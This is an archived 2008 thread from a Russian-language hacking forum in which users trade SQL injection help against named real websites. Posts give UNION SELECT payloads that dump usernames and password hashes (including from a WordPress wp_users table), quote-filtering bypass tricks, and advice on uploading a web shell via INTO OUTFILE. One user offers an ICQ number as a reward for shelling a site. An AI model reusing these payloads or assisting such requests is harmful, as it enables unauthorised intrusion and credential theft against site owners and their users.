ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

28.03.2008, 12:26
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме: 3660186
Репутация:
905
|
|
Вставь в запрос кавычки и посмотри, выведется ли такая же страница, как и без кавычек, или нет. Обходится функциями hex(), char(), encode/decode, aes_encrypt/aes_decrypt...
При наличии фильтрации кавычек шелл через INTO OUTFILE не зальешь, даже имея file_priv.
file_priv проверяй с помощью, например, функции LOAD_FILE().
|
|
|

29.03.2008, 03:58
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме: 2706059
Репутация:
206
|
|
http://sc-ufa.uraltb.ru/?id=0+union+select+1,2,3/*
админку не нашёл там форум есть наверное fastBB помогите пароль узнать, или шелл как-нить залить
|
|
|

29.03.2008, 21:22
|
|
Новичок
Регистрация: 11.11.2007
Сообщений: 5
Провел на форуме: 55344
Репутация:
0
|
|
Нужна помощь с софтом надо чтобы прога перебирала +limit+1,1 ; +limit+2,1 ; +limit+3,1 итд
И записывала куданить то что выплёвывается.
|
|
|

30.03.2008, 15:29
|
|
Новичок
Регистрация: 11.11.2007
Сообщений: 5
Провел на форуме: 55344
Репутация:
0
|
|
Сообщение от SVAROG
http://sc-ufa.uraltb.ru/?id=0+union+select+1,2,3/*
админку не нашёл там форум есть наверное fastBB помогите пароль узнать, или шелл как-нить залить
Код:
_http://sc-ufa.uraltb.ru/?id=0+union+select+1,concat_ws(0x3a,username,password),3+from+_a3user/*
Юзай лимит чтобы менять пользователей мож и наёдеш то что тебе надо.
|
|
|

31.03.2008, 12:21
|
|
Новичок
Регистрация: 31.01.2008
Сообщений: 28
Провел на форуме: 66005
Репутация:
13
|
|
Привет!
Есть блог WordPress http://www.timwu.org/log/
Пробовал уязвимость типа
hxxp://www.timwu.org/log/?p=55'+union+select+concat(user_login,user_pass)+f rom+wp_users
(также и без кавычки), однако выдает то же что и для ?p=55.
Вариант hxxp://www.timwu.org/log/?page_id=[sql] также не проходит.
Плагины найти не удалось (кроме Akismet), не дает листать директорию.
Один момент: уязвимость точно есть. Другой взломщик оставил след в виде измененных файлов шаблона.
Или может быть здесь есть XSS? подскажите, пожалуйста.
Репутацией не обижу
|
|
|

16.04.2008, 20:00
|
|
Новичок
Регистрация: 04.01.2008
Сообщений: 14
Провел на форуме: 185424
Репутация:
2
|
|
Скажите пожалуйста можно ли, в данном случае хоть как-то вернуть значение?
Например:
Код HTML:
http://uin-shop.ru/description.php?id=9999+union+select+null,'test',null/*
|
|
|

16.04.2008, 20:44
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме: 1266776
Репутация:
93
|
|
FluffY, столбцов там не 3, а 2.
Стоит 5 или выше версия мускула. Дальше пока не нарыл.
|
|
|

22.04.2008, 05:46
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме: 3152874
Репутация:
1020
|
|
Сообщение от FluffY
Скажите пожалуйста можно ли, в данном случае хоть как-то вернуть значение?
Например:
Код HTML:
http://uin-shop.ru/description.php?id=9999+union+select+null,'test',null/*
Дык читай - там же написано все - скули нету - сайт через который ведеться рега(или че там) - в нем какая то ошибка XML:
http://shop.digiseller.ru/xml/personal_goods_info.asp
|
|
|

24.04.2008, 19:42
|
|
Новичок
Регистрация: 04.01.2008
Сообщений: 14
Провел на форуме: 185424
Репутация:
2
|
|
Это не ошибка, это рандом тест.
|
|
|

02.05.2008, 08:37
|
|
Участник форума
Регистрация: 21.10.2006
Сообщений: 171
Провел на форуме: 2902967
Репутация:
413
|
|
_http://podsekai.ru/page.php?id=104'
В скулях ничего не понимаю.
Но тот, кто зальет туда шел получит шестизнак хуз 966939
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|